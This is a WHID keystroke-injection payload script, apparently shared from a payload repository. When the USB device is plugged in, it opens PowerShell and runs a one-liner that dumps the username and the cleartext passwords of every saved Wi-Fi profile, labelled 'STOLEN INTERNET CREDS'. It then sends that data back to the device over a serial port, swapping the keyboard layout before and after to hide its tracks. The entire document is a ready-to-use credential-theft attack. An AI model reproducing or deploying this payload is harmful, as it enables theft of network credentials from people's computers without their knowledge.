Rem:Swap keyboard-layout
Press:131+114
Print:PowerShell Set/WinUserLanguageList /LanguageList en/US, nb /Force
Press:176
Rem:Initial Payload created by @TravisPooley https://github.com/TravisPooley/WHID-Payloads
Press:131+114
PrintLine:powershell
CustomDelay:2000
Press:176
CustomDelay:5000
PrintLine:$n = "STOLEN INTERNET CREDS FROM:";$n += whoami;$n += (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim();$_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim();$_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String; $s=(Get-WmiObject -Class Win32_PnPEntity -Namespace 'root\CIMV2' -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value;$port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one;$port.open();ForEach ($l in $($n -split "`r`n")){$port.WriteLine("SerialEXFIL:$l");};
CustomDelay:10000
PrintLine:$port.Close();exit;

Rem:Swap keyboard-layout
Press:131+114
Print:PowerShell Set-WinUserLanguageList -LanguageList nb, en-US -Force
Press:176